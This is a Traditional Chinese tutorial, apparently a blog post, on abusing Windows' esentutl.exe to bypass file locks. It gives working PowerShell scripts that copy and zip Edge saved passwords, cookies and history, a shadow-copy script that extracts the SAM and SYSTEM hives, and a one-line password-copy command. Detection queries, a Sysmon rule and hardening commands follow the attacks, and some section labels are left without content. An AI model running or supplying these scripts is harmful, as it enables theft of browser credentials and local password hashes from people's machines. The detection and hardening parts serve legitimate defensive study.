Esentutl.exe是Windows內建的ESE資料庫工具,
他的檔案複製功能可繞過檔案鎖定,
所以也常常成為攻擊者竊取資料的好工具。
C:\Windows\System32\esentutl.exe
/y
(複製檔案)、/vss
(使用陰影複製)先測試esentutl是否正常運作:
echo test > t.txt
esentutl /y t.txt /d c.txt /o
cat c.txt
rm t.txt,c.txt -F
看到"Operation completed successfully"表示正常。
繞過瀏覽器鎖定,複製儲存的密碼和Cookie。
$b = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
$o = "$env:TEMP\bd"
mkdir $o -F | Out-Null
ls "$b\*Data","$b\Cookies","$b\History" -EA 0 | % {
esentutl /y $_.FullName /d "$o\$($_.Name).db" /o 2>$null
}
Compress-Archive $o "$env:TEMP\b.zip" -F
echo "Done: $env:TEMP\b.zip"
rm $o -R -F
執行結果分析:
當執行時,esentutl會顯示複製進度:
Initiating COPY FILE mode...
Source File: ...\Login Data
Copy Progress: |----|----|----|----|
Operation completed successfully
技術重點:
攻擊價值:
配合陰影複製存取SAM資料庫。
vssadmin create shadow /for=C: 2>$null
$s = (vssadmin list shadows | Select-String "HarddiskVolumeShadowCopy" | Select -Last 1) -replace '.*Copy(\d+).*','$1'
if($s){
$p = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$s"
esentutl /y "$p\Windows\System32\config\SAM" /d "$env:TEMP\SAM" /o 2>$null
esentutl /y "$p\Windows\System32\config\SYSTEM" /d "$env:TEMP\SYSTEM" /o 2>$null
if(Test-Path "$env:TEMP\SAM"){echo "[+] SAM extracted"}
if(Test-Path "$env:TEMP\SYSTEM"){echo "[+] SYSTEM extracted"}
rm "$env:TEMP\SAM","$env:TEMP\SYSTEM" -F -EA 0
}
攻擊價值:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
? {$_.Message -match 'esentutl.*/y'}
<RuleGroup name="Esentutl_Abuse">
<ProcessCreate onmatch="include">
<Image condition="end with">esentutl.exe</Image>
<CommandLine condition="contains any">Login Data;Cookies;SAM;SYSTEM;/y</CommandLine>
</ProcessCreate>
</RuleGroup>
icacls C:\Windows\System32\esentutl.exe /grant Administrators:(RX) /inheritance:r
auditpol /set /subcategory:"File System" /success:enable /failure:enable
wevtutil qe Security /q:"*[EventData[Data[@Name='ObjectName'] and (Data='*Login Data*' or Data='*SAM*')]]" /f:text
esentutl /y * /d *
- 檔案複製模式Esentutl危險是因為:
一行竊取瀏覽器密碼:
esentutl /y "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data" /d pwd.db /o